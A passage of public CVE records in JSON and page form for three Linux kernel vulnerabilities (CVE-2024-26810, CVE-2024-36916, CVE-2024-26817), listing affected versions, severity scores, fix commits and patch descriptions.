Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 03505e3344b0576fd619416793a31eae9c5b73bf (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 810cd4bb53456d0503cc4e7934e063835152c1b7 (git)

Linux

Affected: 3.6
Unaffected: 0 , < 3.6 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 4.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26810",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-05T17:23:22.081964Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T20:03:53.512Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.648Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1e71b6449d55179170efc8dee8664510bb813b42"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3dd9be6cb55e0f47544e7cdda486413f7134e3b3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec73e079729258a05452356cf6d098bf1504d5a6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3fe0ac10bd117df847c93408a9d428a453cd60e5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04a4a017b9ffd7b0f427b8c376688d14cb614651"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6fe478d855b20ac1eb5da724afe16af5a2aaaa40"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03505e3344b0576fd619416793a31eae9c5b73bf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/810cd4bb53456d0503cc4e7934e063835152c1b7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/pci/vfio_pci_intrs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1e71b6449d55179170efc8dee8664510bb813b42",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "3dd9be6cb55e0f47544e7cdda486413f7134e3b3",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "ec73e079729258a05452356cf6d098bf1504d5a6",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "3fe0ac10bd117df847c93408a9d428a453cd60e5",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "04a4a017b9ffd7b0f427b8c376688d14cb614651",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "6fe478d855b20ac1eb5da724afe16af5a2aaaa40",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "03505e3344b0576fd619416793a31eae9c5b73bf",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            },
            {
              "lessThan": "810cd4bb53456d0503cc4e7934e063835152c1b7",
              "status": "affected",
              "version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/pci/vfio_pci_intrs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.6"
            },
            {
              "lessThan": "3.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Lock external INTx masking ops\n\nMask operations through config space changes to DisINTx may race INTx\nconfiguration changes via ioctl.  Create wrappers that add locking for\npaths outside of the core interrupt code.\n\nIn particular, irq_type is updated holding igate, therefore testing\nis_intx() requires holding igate.  For example clearing DisINTx from\nconfig space can otherwise race changes of the interrupt configuration.\n\nThis aligns interfaces which may trigger the INTx eventfd into two\ncamps, one side serialized by igate and the other only enabled while\nINTx is configured.  A subsequent patch introduces synchronization for\nthe latter flows."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:57:05.248Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1e71b6449d55179170efc8dee8664510bb813b42"
        },
        {
          "url": "https://git.kernel.org/stable/c/3dd9be6cb55e0f47544e7cdda486413f7134e3b3"
        },
        {
          "url": "https://git.kernel.org/stable/c/ec73e079729258a05452356cf6d098bf1504d5a6"
        },
        {
          "url": "https://git.kernel.org/stable/c/3fe0ac10bd117df847c93408a9d428a453cd60e5"
        },
        {
          "url": "https://git.kernel.org/stable/c/04a4a017b9ffd7b0f427b8c376688d14cb614651"
        },
        {
          "url": "https://git.kernel.org/stable/c/6fe478d855b20ac1eb5da724afe16af5a2aaaa40"
        },
        {
          "url": "https://git.kernel.org/stable/c/03505e3344b0576fd619416793a31eae9c5b73bf"
        },
        {
          "url": "https://git.kernel.org/stable/c/810cd4bb53456d0503cc4e7934e063835152c1b7"
        }
      ],
      "title": "vfio/pci: Lock external INTx masking ops",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26810",
    "datePublished": "2024-04-05T08:24:41.987Z",
    "dateReserved": "2024-02-19T14:20:24.179Z",
    "dateUpdated": "2025-05-04T08:57:05.248Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36916 (GCVE-0-2024-36916)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:29 – Updated: 2025-05-20 14:27

Title

blk-iocost: avoid out of bounds shift

Summary

In the Linux kernel, the following vulnerability has been resolved: blk-iocost: avoid out of bounds shift UBSAN catches undefined behavior in blk-iocost, where sometimes iocg->delay is shifted right by a number that is too large, resulting in undefined behavior on some architectures. [ 186.556576] ------------[ cut here ]------------ UBSAN: shift-out-of-bounds in block/blk-iocost.c:1366:23 shift exponent 64 is too large for 64-bit type 'u64' (aka 'unsigned long long') CPU: 16 PID: 0 Comm: swapper/16 Tainted: G S E N 6.9.0-0_fbk700_debug_rc2_kbuilder_0_gc85af715cac0 #1 Hardware name: Quanta Twin Lakes MP/Twin Lakes Passive MP, BIOS F09_3A23 12/08/2020 Call Trace: <IRQ> dump_stack_lvl+0x8f/0xe0 __ubsan_handle_shift_out_of_bounds+0x22c/0x280 iocg_kick_delay+0x30b/0x310 ioc_timer_fn+0x2fb/0x1f80 __run_timer_base+0x1b6/0x250 ... Avoid that undefined behavior by simply taking the "delay = 0" branch if the shift is too large. I am not sure what the symptoms of an undefined value delay will be, but I suspect it could be more than a little annoying to debug.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/62accf6c1d7b43375…
	https://git.kernel.org/stable/c/844fc023e9f14a4fb…
	https://git.kernel.org/stable/c/f6add0a6f78dc6360…
	https://git.kernel.org/stable/c/ce0e99cae00e31318…
	https://git.kernel.org/stable/c/488dc6808cb836968…
	https://git.kernel.org/stable/c/beaa51b36012fad5a…

Impacted products

Vendor

Product

Version

Linux

Affected: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 , < 62accf6c1d7b433752cb3591bba8967b7a801ad5 (git)
Affected: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 , < 844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1 (git)
Affected: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 , < f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca (git)
Affected: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 , < ce0e99cae00e3131872936713b7f55eefd53ab86 (git)
Affected: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 , < 488dc6808cb8369685f18cee81e88e7052ac153b (git)
Affected: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 , < beaa51b36012fad5a4d3c18b88a617aea7a9b96d (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "LOW",
              "baseScore": 6.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "LOW",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36916",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-12T19:19:24.548838Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-04T20:36:10.637Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-09-05T08:03:32.685Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/62accf6c1d7b433752cb3591bba8967b7a801ad5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ce0e99cae00e3131872936713b7f55eefd53ab86"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/488dc6808cb8369685f18cee81e88e7052ac153b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/beaa51b36012fad5a4d3c18b88a617aea7a9b96d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20240905-0006/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "block/blk-iocost.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "62accf6c1d7b433752cb3591bba8967b7a801ad5",
              "status": "affected",
              "version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
              "versionType": "git"
            },
            {
              "lessThan": "844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1",
              "status": "affected",
              "version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
              "versionType": "git"
            },
            {
              "lessThan": "f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca",
              "status": "affected",
              "version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
              "versionType": "git"
            },
            {
              "lessThan": "ce0e99cae00e3131872936713b7f55eefd53ab86",
              "status": "affected",
              "version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
              "versionType": "git"
            },
            {
              "lessThan": "488dc6808cb8369685f18cee81e88e7052ac153b",
              "status": "affected",
              "version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
              "versionType": "git"
            },
            {
              "lessThan": "beaa51b36012fad5a4d3c18b88a617aea7a9b96d",
              "status": "affected",
              "version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "block/blk-iocost.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-iocost: avoid out of bounds shift\n\nUBSAN catches undefined behavior in blk-iocost, where sometimes\niocg-\u003edelay is shifted right by a number that is too large,\nresulting in undefined behavior on some architectures.\n\n[  186.556576] ------------[ cut here ]------------\nUBSAN: shift-out-of-bounds in block/blk-iocost.c:1366:23\nshift exponent 64 is too large for 64-bit type \u0027u64\u0027 (aka \u0027unsigned long long\u0027)\nCPU: 16 PID: 0 Comm: swapper/16 Tainted: G S          E    N 6.9.0-0_fbk700_debug_rc2_kbuilder_0_gc85af715cac0 #1\nHardware name: Quanta Twin Lakes MP/Twin Lakes Passive MP, BIOS F09_3A23 12/08/2020\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x8f/0xe0\n __ubsan_handle_shift_out_of_bounds+0x22c/0x280\n iocg_kick_delay+0x30b/0x310\n ioc_timer_fn+0x2fb/0x1f80\n __run_timer_base+0x1b6/0x250\n...\n\nAvoid that undefined behavior by simply taking the\n\"delay = 0\" branch if the shift is too large.\n\nI am not sure what the symptoms of an undefined value\ndelay will be, but I suspect it could be more than a\nlittle annoying to debug."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-20T14:27:33.761Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/62accf6c1d7b433752cb3591bba8967b7a801ad5"
        },
        {
          "url": "https://git.kernel.org/stable/c/844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1"
        },
        {
          "url": "https://git.kernel.org/stable/c/f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/ce0e99cae00e3131872936713b7f55eefd53ab86"
        },
        {
          "url": "https://git.kernel.org/stable/c/488dc6808cb8369685f18cee81e88e7052ac153b"
        },
        {
          "url": "https://git.kernel.org/stable/c/beaa51b36012fad5a4d3c18b88a617aea7a9b96d"
        }
      ],
      "title": "blk-iocost: avoid out of bounds shift",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36916",
    "datePublished": "2024-05-30T15:29:12.745Z",
    "dateReserved": "2024-05-30T15:25:07.068Z",
    "dateUpdated": "2025-05-20T14:27:33.761Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26817 (GCVE-0-2024-26817)

Vulnerability from cvelistv5 – Published: 2024-04-13 11:17 – Updated: 2025-11-04 18:29

Title

amdkfd: use calloc instead of kzalloc to avoid integer overflow

Summary

In the Linux kernel, the following vulnerability has been resolved: amdkfd: use calloc instead of kzalloc to avoid integer overflow This uses calloc instead of doing the multiplication which might overflow.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e6721ea845fcb93a7…
	https://git.kernel.org/stable/c/8b0564704255c6b3c…
	https://git.kernel.org/stable/c/fcbd99b3c73309107…
	https://git.kernel.org/stable/c/cbac7de1d9901521e…
	https://git.kernel.org/stable/c/e6768c6737f4c02cb…
	https://git.kernel.org/stable/c/315eb3c2df7e4cb18…
	https://git.kernel.org/stable/c/0c33d11153949310d…
	https://git.kernel.org/stable/c/3b0daecfeac0103ab…

Impacted products

Vendor

Product

Version

Linux

Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < e6721ea845fcb93a764a92bd40f1afc0d6c69751 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 8b0564704255c6b3c6a7188e86939f754e1577c0 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < fcbd99b3c73309107e3be71f20dff9414df64f91 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < cbac7de1d9901521e78cdc34e15451df3611f2ad (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < e6768c6737f4c02cba193a3339f0cc2907f0b86a (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7 (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 0c33d11153949310d76631d8f4a4736519eacd3a (git)
Affected: 4a488a7ad71401169cecee75dc94bcce642e2c53 , < 3b0daecfeac0103aba8b293df07a0cbaf8b43f29 (git)

Linux

Affected: 3.19
Unaffected: 0 , < 3.19 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26817",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-15T12:56:37.523191Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:22:41.285Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T18:29:59.654Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6721ea845fcb93a764a92bd40f1afc0d6c69751"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b0564704255c6b3c6a7188e86939f754e1577c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fcbd99b3c73309107e3be71f20dff9414df64f91"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cbac7de1d9901521e78cdc34e15451df3611f2ad"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6768c6737f4c02cba193a3339f0cc2907f0b86a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c33d11153949310d76631d8f4a4736519eacd3a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3b0daecfeac0103aba8b293df07a0cbaf8b43f29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P3TH6JK7ZZMSXSVHOJKIMSSOC6EQM4WV/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e6721ea845fcb93a764a92bd40f1afc0d6c69751",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "8b0564704255c6b3c6a7188e86939f754e1577c0",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "fcbd99b3c73309107e3be71f20dff9414df64f91",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "cbac7de1d9901521e78cdc34e15451df3611f2ad",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "e6768c6737f4c02cba193a3339f0cc2907f0b86a",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "0c33d11153949310d76631d8f4a4736519eacd3a",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            },
            {
              "lessThan": "3b0daecfeac0103aba8b293df07a0cbaf8b43f29",
              "status": "affected",
              "version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
